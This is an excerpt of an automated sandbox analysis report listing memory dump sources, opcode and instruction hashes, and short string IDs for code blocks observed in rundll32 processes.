                                                                                                                                                                                                                                                                                                • Opcode ID: 3d064fa02919d8d8918c028ac390bb26164d4a2940bb291ea53a1c2a508aa247
                                                                                                                                                                                                                                                                                                • Instruction ID: 0f8e005be1cfce732801411eb6a98a422e98ab964dfacaa7c6795294f55a1f86
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d064fa02919d8d8918c028ac390bb26164d4a2940bb291ea53a1c2a508aa247
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2351C136B0020A8FDB55DFB8D9505AFBBFAAFC9350B14853AE814D7364DA349C11C7A1
                                                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: e93b882ad063cdb736447ed854d55119a0e10f5e4f561405fad288a76c5850bc
                                                                                                                                                                                                                                                                                                • Instruction ID: 1d45e4f28e16680c459dd0f8c2ae3839fae29ba5ee7d5ea9fe04ac91d92e56db
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e93b882ad063cdb736447ed854d55119a0e10f5e4f561405fad288a76c5850bc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB719435F002199FEF55EB75C954A6EBAA7AFC8200F148039D506EB3A4DE31DC42C7A1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: c564fbe14e02aeaf05214dea45de1c67b06bbad0347b8bacdc51cebc35497c38
                                                                                                                                                                                                                                                                                                • Instruction ID: fb19e7defe249ae48925437f746b6ffbdcc3b0b4b6f6634969a03206cace38e3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c564fbe14e02aeaf05214dea45de1c67b06bbad0347b8bacdc51cebc35497c38
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81312326F283582BEFA97A39581437E7FEBDFC1254F04846AD901C7682DE649D0583B2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: 370f0babee371a587fc18f622bdac1e74d1a2b5a4e0749f73233655492ec7901
                                                                                                                                                                                                                                                                                                • Instruction ID: 765d91c48a3f67ad0a40e331d12cc612c6244515cd8e5c1025b4e6b7d29ed1d1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 370f0babee371a587fc18f622bdac1e74d1a2b5a4e0749f73233655492ec7901
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C331E431B092495FFB98AA798C243BF7BE79BC5300F14846EE502A72C5CE755C0587B2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 442809d5980218eb444a5f782a71c43c453d90090f21a5d572846d30eb7b9b6e
                                                                                                                                                                                                                                                                                                • Instruction ID: 0b9b555cc0055391020348a41559362b6d9c22a1683f2812783224e8ac75e841
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 442809d5980218eb444a5f782a71c43c453d90090f21a5d572846d30eb7b9b6e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D0E092B580430A9FC790EF79880125ABFF0BF55200B6046AED448D3601F7329642CBA1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6dba3acd0ba70b679e6a032f2527474be33241adfb9173d15e6461acb663a894
                                                                                                                                                                                                                                                                                                • Instruction ID: 1c9e39f261f1f22c4eced628a2213b7df2992a90841d873971cc7a3bb45eb37e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6dba3acd0ba70b679e6a032f2527474be33241adfb9173d15e6461acb663a894
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6751DC31F212059FDB50CB6CD980A6ABBF1FF88304B1081A6E518DB262EB31DD41CBA0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1b9b08ed314704cbac276258ea62f3a8987ba0ce98d64f22db05319f3c526ad9
                                                                                                                                                                                                                                                                                                • Instruction ID: c27acde58639656d370f92ad926ff4fcf24f1855be5c32281070b59eb722b817
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b9b08ed314704cbac276258ea62f3a8987ba0ce98d64f22db05319f3c526ad9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07410635F101189FDB94DF68D98099EBBB6FF88310B10816AE905EB364DB31ED41CBA0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d30d71b9762e5087165751d6acfd84ef3406c63c097f5b9434e0e30753c7d3c2
                                                                                                                                                                                                                                                                                                • Instruction ID: 41b9feeff8ff38bd7bedb6e8a880bd687e7e1b6b9335880063fac02dfe6cfe7c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d30d71b9762e5087165751d6acfd84ef3406c63c097f5b9434e0e30753c7d3c2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35210A36F003559BFF54EE69C9606AE7BEAAF85250F04403BD902C7254EE31C956C7A1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 9e0db3cbd38307338f4ab1ac3454facb419321fe1583f62db2730357f31dbc74
                                                                                                                                                                                                                                                                                                • Instruction ID: 96baad8de3b256ff6723c5ffc5fab7c2c62044e15a676683db05278cfb2863ff
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e0db3cbd38307338f4ab1ac3454facb419321fe1583f62db2730357f31dbc74
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2113D32E6131A6FEB943A686C143BB7BC9DF41370F108436FE5896580DE35858593F0
Memory Dump Source
• Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
Memory Dump Source
• Source File: 00000003.00000002.1663134577.00000000049BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049BD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_49bd000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 241b9fb2b48087fdd3506995ec92dab566ae6625727eb33be8edff19258eae13
                                                                                                                                                                                                                                                                                                • Instruction ID: a317cb5c931f017a266c5e6f844ac2cf4dd6c284a46f9161501106599dc77871
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 241b9fb2b48087fdd3506995ec92dab566ae6625727eb33be8edff19258eae13
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91F0B437B153106BEFB4A91AA884B7BB7EAEFD4754F04402DE90483244DB344A0191B4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 02312d534909c2bd88f057fc6cff28124b3d17d8534b2d3ffed393276dfec711
                                                                                                                                                                                                                                                                                                • Instruction ID: 93a529676778107cfcd1ad974e7172b5b58d3402c13d64f9915ea60ede6266b8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02312d534909c2bd88f057fc6cff28124b3d17d8534b2d3ffed393276dfec711
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2F0C239A0020B4FDB58AFFC55211263BDBBFE6218314197E8606CF9A0EA248840CFA1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d7e35ab8db20147d21d92057a2c79237d059249d0ec9a59321a96ada959113d2
                                                                                                                                                                                                                                                                                                • Instruction ID: 2cc078944000ac8b93625048df3032d934f4d27981133bb656abb905f39ee740
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7e35ab8db20147d21d92057a2c79237d059249d0ec9a59321a96ada959113d2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25F0E937B101958BCB589678D4582FDFBB39BC9220F14816ED442A7644EF72191DCB50
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0ddf4a02faad9af11de16dd8fc894ec90ff511270807e3d16b59626a9d63b0c8
                                                                                                                                                                                                                                                                                                • Instruction ID: 91154d3581710205daf0ceccc46e7b493a1109348474c9b6c651547b4cff403b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ddf4a02faad9af11de16dd8fc894ec90ff511270807e3d16b59626a9d63b0c8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90E09221F3531827FFF829685D1076676DE5B42608F000839C601C7A82D8C0EA4403F2
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c2881f425f31556c5847a33839271aa50b3d656740adb1a19fbd74d9f85f70f5
                                                                                                                                                                                                                                                                                                • Instruction ID: 09f83116ccf9cc6eedddc3dd77cb13f200de2eb322db61207418ce0ec1539a20
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2881f425f31556c5847a33839271aa50b3d656740adb1a19fbd74d9f85f70f5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56E0E537F101188BCB189668E4584EDB7BADBC8210B108036D902A3744EF302D19CBA1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0129422980dd3106f117f8c535715c05d57a642849e550a4fd44a6266b02a6ea
                                                                                                                                                                                                                                                                                                • Instruction ID: 63609341170c45bf946f9c1255d2111f98264be69b0b4eb55582f78c078bf753
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0129422980dd3106f117f8c535715c05d57a642849e550a4fd44a6266b02a6ea
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8D02B372041045BC7141B10EC036D67FEDD748621B04402BF84187250CF726C50C7F0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
Memory Dump Source
• Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
Strings
Memory Dump Source
• Source File: 00000004.00000003.1698644470.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_7070000_rundll32.jbxd
Strings
Memory Dump Source
• Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F192DB70A4021CDFDB259FA4C954AEEBBB2FF49300F1045E9D5096B2A4DB399E85CF81
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq$\;kq$|jq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3241521890
                                                                                                                                                                                                                                                                                                • Opcode ID: 0f9f471c3f2669ff82e67a7576646327b5cbdfa00152429efe18e0d4841c0005
                                                                                                                                                                                                                                                                                                • Instruction ID: 9ed7c799e3b9305452b7e9759797d309173e9b56112dffe1c72e5dc03d8b0b68
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f9f471c3f2669ff82e67a7576646327b5cbdfa00152429efe18e0d4841c0005
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E161A575F481178FEB589A7A995067FB6ABBFC4240B208026D805D73A8EE34DC0287F1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq$d
                                                                                                                                                                                                                                                                                                • API String ID: 0-886291620
                                                                                                                                                                                                                                                                                                • Opcode ID: 435d0428778f3c708e8f915012289df80bad318ed9d69df3cd37498e4f6d9755
                                                                                                                                                                                                                                                                                                • Instruction ID: 333fef03ed23135b3569b65cb2c5efdf24c70f925e2eb7aeedf701720476db8d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 435d0428778f3c708e8f915012289df80bad318ed9d69df3cd37498e4f6d9755
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D027C34A006058FDB54CF19C58096AFBF2FF8A354B25CA69D46A9B365D730FC46CBA0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: $kq$$kq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3550614674
                                                                                                                                                                                                                                                                                                • Opcode ID: 7f4c3d0472d69dd1dbad8853cda970c11729dcaa0ff8d095b041490e34d9d27e
                                                                                                                                                                                                                                                                                                • Instruction ID: 00867e593b20cc999d8767377f0252647683e9409dab67aa84079007a410f0cb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f4c3d0472d69dd1dbad8853cda970c11729dcaa0ff8d095b041490e34d9d27e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0351C232B0020A8FDB55DFB8D8506AFBBFAAFC9350B14853AE814D7364DA349D11C7A1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq$(oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3207256227
                                                                                                                                                                                                                                                                                                • Opcode ID: 3b7688b751916b3934440bf36246915b4687391d5f39b282f7f2a59b7ed62465
                                                                                                                                                                                                                                                                                                • Instruction ID: 6f6c2720ebf15243db718d652d36fcd24a62610eeac9e1385f6d923dfa6783b4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b7688b751916b3934440bf36246915b4687391d5f39b282f7f2a59b7ed62465
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC41F631B042449FEB55CF69C855B9EBFF2EF89210F158199D805AB381CA35ED02CBA0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq$LRkq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3710894217
                                                                                                                                                                                                                                                                                                • Opcode ID: 681cef89e181edd46f914e8529d8ea398b5342744718f00094747fdc6466f3c2
                                                                                                                                                                                                                                                                                                • Instruction ID: d35c2ecd85d091426fa3d3af15842a8cce10f2e36a7d1d144d9146103b51c6bf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 681cef89e181edd46f914e8529d8ea398b5342744718f00094747fdc6466f3c2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1641E136B082549FEF599B78A81873F7AABEBC5204F14846AE402D73D5DE38DC0187A1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                • Opcode ID: e259cf0320ee28519e1e56fe8475fb9668ab8898a7069db237f59499fa5a9295
                                                                                                                                                                                                                                                                                                • Instruction ID: dc7002a2ac09d81378d70e574fc4c893b34eea2bba823a279fb100d4f480f145
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e259cf0320ee28519e1e56fe8475fb9668ab8898a7069db237f59499fa5a9295
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5C1AE70B102158FEB64DF69C45492EBBE6BFC8314B248469E446DB3A4DF34EC41CB91
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (Apq
                                                                                                                                                                                                                                                                                                • API String ID: 0-1034389350
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 07079FF8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698644470.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7070000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 6842923-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • KiUserExceptionDispatcher.NTDLL ref: 07079FF8
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698644470.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_7070000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 6842923-0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (oq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3175707579
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000004.00000003.1698622412.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_4_3_6f90000_rundll32.jbxd
